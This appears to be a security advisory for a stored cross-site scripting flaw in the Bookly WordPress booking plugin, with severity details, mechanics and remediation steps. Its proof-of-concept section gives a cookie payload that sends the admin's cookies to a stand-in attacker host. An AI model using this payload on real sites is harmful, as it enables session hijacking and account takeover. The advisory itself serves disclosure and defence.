Overview
A stored cross-site scripting (XSS) vulnerability has been identified in the Bookly — Online Scheduling and Appointment Booking System plugin for WordPress. Tracked as CVE-2026-5513 with a CVSS score of 7.2 (Medium), the flaw affects all versions up to and including 27.2.
The vulnerability exists due to insufficient input sanitization on the bookly-customer-full-name cookie value and inadequate output escaping when that value is later rendered in the admin interface.
Technical Details
| Field | Value |
|---|---|
| CVE ID | CVE-2026-5513 |
| CVSS Score | 7.2 (Medium) |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N |
| CWE | CWE-79 (Improper Neutralization of Input During Web Page Generation) |
| Affected Software | Bookly WordPress Plugin |
| Affected Versions | 27.2 and earlier |
| Attack Vector | Network |
| Privileges Required | None |
| User Interaction | None |
| Published | June 13, 2026 |
Vulnerability Mechanics
The Bookly plugin stores user-supplied values — including a customer full name — inside the bookly-customer-full-name cookie during the booking process. When an administrator subsequently views booking records or customer lists in the WordPress admin dashboard, the plugin renders this cookie-derived value without proper escaping.
An unauthenticated attacker can craft a malicious HTTP request that sets this cookie to contain JavaScript payload. When an admin user views the affected page, the script executes in the context of the admin session, enabling:
- Session hijacking — exfiltrating admin session cookies
- Credential theft — injecting fake login forms
- Backdoor installation — redirecting admin to attacker-controlled pages
- Site defacement — modifying page content dynamically
Affected Components
bookly-customer-full-namecookie parameter (unauthenticated input)- Admin-side rendering of customer booking data
Proof of Concept
An attacker can trigger the vulnerability by submitting a booking request with a crafted cookie:
Cookie: bookly-customer-full-name=<script>document.location='https://attacker.example/steal?c='+document.cookie</script>
When the WordPress administrator navigates to the Bookly customer management panel, the injected script executes in their browser session.
Remediation
Immediate Actions
- Update Bookly to a patched version above 27.2 as soon as the vendor releases a fix
- Monitor WordPress admin access logs for unusual activity
- Review existing booking records for suspicious customer name entries
- Enable a Web Application Firewall (WAF) rule to block XSS payloads in cookie headers
Mitigation (if patch unavailable)
- Restrict access to the WordPress admin panel by IP allowlist
- Implement Content Security Policy (CSP) headers to limit script execution
- Use a WAF to sanitize incoming cookie values
WordPress Site Owners: Next Steps
Sites running Bookly for appointment management should treat this as a priority patch. The unauthenticated attack surface (no login required to exploit) combined with admin-side impact makes this a significant risk for any site accepting public bookings.
Check the Bookly changelog and WordPress Plugin Directory for the patched release, or temporarily disable the plugin until an update is available.